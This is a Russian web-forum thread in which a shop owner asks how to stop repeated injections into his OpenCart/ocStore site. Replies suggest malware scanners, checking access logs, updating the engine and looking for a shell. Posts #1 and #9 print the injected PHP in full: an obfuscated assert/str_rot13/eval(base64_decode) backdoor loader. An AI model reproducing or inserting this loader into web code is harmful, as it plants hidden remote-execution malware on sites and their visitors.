X   Сообщение сайта
(Сообщение закроется через 3 секунды)



 

Здравствуйте, гость ( Вход | Регистрация )

2 страниц V   1 2 >
Открыть тему
Тема закрыта
> В мгазин Opencart внедряют вредоносный код, Как защититься от взлома?
maxmer
maxmer
Topic Starter сообщение 17.6.2015, 19:28; Ответить: maxmer
Сообщение #1


Участник
***

Группа: User
Сообщений: 207
Регистрация: 1.10.2011
Поблагодарили: 66 раз
Репутация:   14  


Всем доброго времени суток.
Столкнулся со следующей проблемой: ломают один магазинчик на Opencart и меняют следующие файлы:

сайт.ру/index.php
сайт.ру/catalog/controller/common/maintenance.php
сайт.ру/catalog/controller/common/footer.php
сайт.ру/catalog/language/russian/common/footer.php
сайт.ру/admin/controller/common/footer.php
сайт.ру/admin/language/russian/common/footer.php

Добавляют в них этот код:
Код
//###=i=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIo
VzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAsJ
lWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250MJ
50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ5
xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9h
K2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9aM
KDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH1
EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYvE
wZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGDl
AGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIE
IAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbWT
ZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWTZ
kXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTyv
qvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWfM
J5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9Vv
51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv4
xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ4
ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1ASH
yMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWT
yvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJZ
4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));'));
//###=i=###


Удалил эту гадость, поменял везде пароли. Через некоторое время все равно внедряют этот код.

Подскажите, пожалуйста, это какая-то уязвимость в движке Opencart или проблема на моей стороне? И как можно защититься от этих взломов?
Буду очень признателен за советы.


Магазин работает на ocStore 1.5.4.1


--------------------
0
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
web2033
web2033
сообщение 17.6.2015, 21:13; Ответить: web2033
Сообщение #2


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 18.5.2015
Поблагодарили: 1 раз
Репутация:   0  


Попробуйте этот сервис:
AI-Bolit — это бесплатный сканер вирусов, хакерских шеллов, бэкдоров, спам-рассыльщиков и других вредоносных скриптов на хостинге.


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
maxmer
maxmer
Topic Starter сообщение 18.6.2015, 18:00; Ответить: maxmer
Сообщение #3


Участник
***

Группа: User
Сообщений: 207
Регистрация: 1.10.2011
Поблагодарили: 66 раз
Репутация:   14  


AI-Bolit к сожалению ничего не находит. Всякие онлайн-проверки на вирусы тоже молчат. Но как-то же заливают гадость?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Maksimus
Maksimus
сообщение 18.6.2015, 18:17; Ответить: Maksimus
Сообщение #4


Частый гость
**

Группа: User
Сообщений: 83
Регистрация: 22.8.2013
Поблагодарили: 13 раз
Репутация:   5  


Добрый день! У меня была такая же проблема на этой платформе,попробуйте воспользоваться этим скриптом от яндекса http://yandex.ru/promo/manul#howtouse

Сообщение отредактировал Maksimus - 18.6.2015, 18:18


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
maxmer
maxmer
Topic Starter сообщение 19.6.2015, 11:11; Ответить: maxmer
Сообщение #5


Участник
***

Группа: User
Сообщений: 207
Регистрация: 1.10.2011
Поблагодарили: 66 раз
Репутация:   14  


Maksimus, спасибо. Пробовал тоже этот скрипт. К сожалению ничего не нашел. Может есть какая-нибудь уязвимость в этой версии Opencart?


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Sev_free
Sev_free
сообщение 21.6.2015, 11:31; Ответить: Sev_free
Сообщение #6


Частый гость
**

Группа: User
Сообщений: 97
Регистрация: 19.6.2015
Из: Севастополь
Поблагодарили: 18 раз
Репутация:   2  


maxmer, пришли в личку ссылку на сайт, погляжу. Скорее всего тебе шелл залили, либо нашли где не фильтруется запрос в бд.


--------------------
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Feax
Feax
сообщение 26.6.2015, 9:58; Ответить: Feax
Сообщение #7


Новичок
*

Группа: Viewer
Сообщений: 3
Регистрация: 9.2.2011
Поблагодарили: 0 раз
Репутация:   1  


Антивирусом вычищать вирусы - это борьба со следствием, чтобы избавиться от причины, нужно либо обновляться на самую свежую версию движка, либо смотреть логи доступа к сайту, искать в них способ взлома и закрывать дыру.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
lawebo
lawebo
сообщение 26.6.2015, 22:54; Ответить: lawebo
Сообщение #8


Новичок
*

Группа: Viewer
Сообщений: 1
Регистрация: 21.6.2015
Поблагодарили: 0 раз
Репутация:   0  


скорей всего шелл, можно пройтись вручную по файлам поискать недавно измененые или которых явно не должно быть...
было похожее на опенкарте в футер код вставляли, нашел левый файлик в image/cache/
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
Sev_free
Sev_free
сообщение 26.6.2015, 23:47; Ответить: Sev_free
Сообщение #9


Частый гость
**

Группа: User
Сообщений: 97
Регистрация: 19.6.2015
Из: Севастополь
Поблагодарили: 18 раз
Репутация:   2  


Оберни с заменой :

Код
if (isset($ibv){
break;
КОД
};

КОД замени на :
Код
//###=i=###
error_reporting(0);
$strings = "as";$strings .= "sert";
@$strings(str_rot13('riny(onfr64_qrpbqr("nJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tWTyvqwftsFOyoUAyVUgcMvtuMJ1jqUxbWS9QG09YFHIo
VzAfnJIhqS9wnTIwnlWqXFyxnJHbWS9QG09YFHIoVzAfnJIhqS9wnTIwnlWqXGgcMvtunKAmMKDbWTAs
J
lWVISEDK0SQD0IDIS9QFRSFH0IHVy0cXKgcMvujpzIaK21uqTAbXPVuYvS1VvkznJkyK2qyqS9wo250M
J
50pltxK1ASHyMSHyfvH0AFFIOHK0MWGRIBDH1SVy0cXFy7WTZjCFWIIRLgBPV7sJIfp2I7WTZjCFW3nJ
5
xo3qmYGRlAGRvB319MJkmMKfxLmN9WTAsJlWVISEDK0SQD0IDIS9QFRSFH0IHVy07sJyzXTM1ozA0nJ9
h
K2I4nKA0pltvL3IloS9cozy0VvxcrlEwZG1wqKWfK2yhnKDbVzu0qUN6Yl8kZQxhZwZ2YwtkYwRjZF9a
M
KDhpTujC2D9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyASHyMSHy9BDH1SVy0hWS9GEIWJEIWoVyWSHIISH
1
EsIIWWVy0cYvVzqG0vYaIloTIhL29xMFtxK1ASHyMSHyfvFSEHHS9IH0IFK0SUEH5HVy0cYvVzLm0vYv
E
wZP4vWzx9ZFMcpQ0vYvEsH0IFIxIFJlWFEH1CIRIsDHERHvWqYvVznQ0vYz1xAFtvAGxjZJSwZwt4MGD
l
AGR5AGV0MGt2Z2MzLmtjZ2SuZQDvYvEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISI
E
IAHK1IFFFWqYvEsH0IFIxIFJlWVISEDK1IGEIWsDHqSGyDvKF4xLmNhVwRvXFx7L3IloS9mMKEipUDbW
T
ZkYQDlYTMuoUAyXGgwqKWfK3AyqT9jqPtxLmRfZGx5ZGZfqUW1MFx7WTyvqvN9VPOwqKWfK2I4MJZbWT
Z
kXGgwqKWfK2Afo3AyXPEwZFx7sJIfp2IcMvucozysM2I0XPWuoTkiq191pzksMz9jMJ4vXG09ZFy7WTy
v
qvN9VTMcoTIsM2I0K2AioaEyoaEmXPWbqUEjBv8iZGN5YwVmAv44ZF4kZQRiM2I0YaObpQ9xCFVhqKWf
M
J5wo2EyXPEsH0IFIxIFJlWGEIWJEIWsGxSAEFWqYvEsH0IFIxIFJlWFEISIEIAHK1IFFFWqXF4vWaH9V
v
51pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXF4vWzZ9Vv4xLmNhVvMcCGRznKN9Vv
4
xK1ASHyMSHyfvHxIAG1ESK0SRESVvKF4vWzt9Vv5gMQHbVwH5ZQSuLmV4BTH0ZwHkBGHlATH4AwAzMzZ
4
ZQAuLGN0Vv4xK1ASHyMSHyfvH0IFIxIFK05OGHHvKF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKF4xK1AS
H
yMSHyfvFSEHHS9IH0IFK0SUEH5HVy0hWTZjYvVkVvxcB30tnJLtXTymp2I0XPEcLaLcXFO7VTIwnT8tW
T
yvqwftsFOcMvucp3AyqPtxK1WSHIISH1EoVaNvKFxtWvLtWS9FEISIEIAHJlWjVy0tCG0tVwuvMzEwMJ
Z
4VvxtrlONLKAmMKW0XPEsHxIEIHIGISfvLlWqXGftsK0="));'));
//###=i=###

И не парься)
А так поднимай логи ищи шелл)
П.С. А так помочь можно только при наличии ссылки на сайт и к бекапу файлов.

Сообщение отредактировал Sev_free - 26.6.2015, 23:53


--------------------


Поблагодарили: (1)
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
SeBun
SeBun
сообщение 26.9.2015, 13:44; Ответить: SeBun
Сообщение #10


Новичок
*

Группа: Viewer
Сообщений: 5
Регистрация: 23.12.2008
Поблагодарили: 0 раз
Репутация:   0  


maxmer, у вас случайно сайт не на timeweb? От движка этот взлом не зависит, заражаются все index.php на всех сайтах аккаунта. Хостер свою вину не признает. Вот тема. Пока разбираюсь. Восстановил все сайты из бекапа, пока полет нормальный. Анализирую зараженные в поисках шелла.
Вернуться в начало страницы
 
Ответить с цитированием данного сообщения
2 страниц V   1 2 >
Открыть тему
Тема закрыта
1 чел. читают эту тему (гостей: 1, скрытых пользователей: 0)
Пользователей: 0


Свернуть

> Похожие темы

  Тема Ответов Автор Просмотров Последний ответ
Горячая тема (нет новых ответов) Разработка сайтов Joomla Wordpress Opencart
Разработка, верстка, оптимизация веб сайтов.
48 WoWeb 7406 12.12.2017, 13:37
автор: serg5777
Открытая тема (нет новых ответов) Разработка сайта OpenCart
Нужно сделать в сроки
4 vadosseo 480 24.11.2017, 23:14
автор: vadosseo
Открытая тема (нет новых ответов) Тема имеет прикрепленные файлыPHP код для og:image в Джумла
Нужен PHP код для заполнения мета тега meta property
8 Курыкин 1363 25.10.2017, 12:06
автор: Fassendek
Открытая тема (нет новых ответов) Промо код Гугл Эдвордс 2000 рублей
Может кому то будет нужен
3 alllffa 876 9.10.2017, 12:12
автор: alllffa
Открытая тема (нет новых ответов) Консультация по opencart
Требуется консультация по Opencart
2 boris_b 435 15.9.2017, 19:31
автор: boris_b


 



RSS Текстовая версия Сейчас: 18.12.2017, 1:40
Дизайн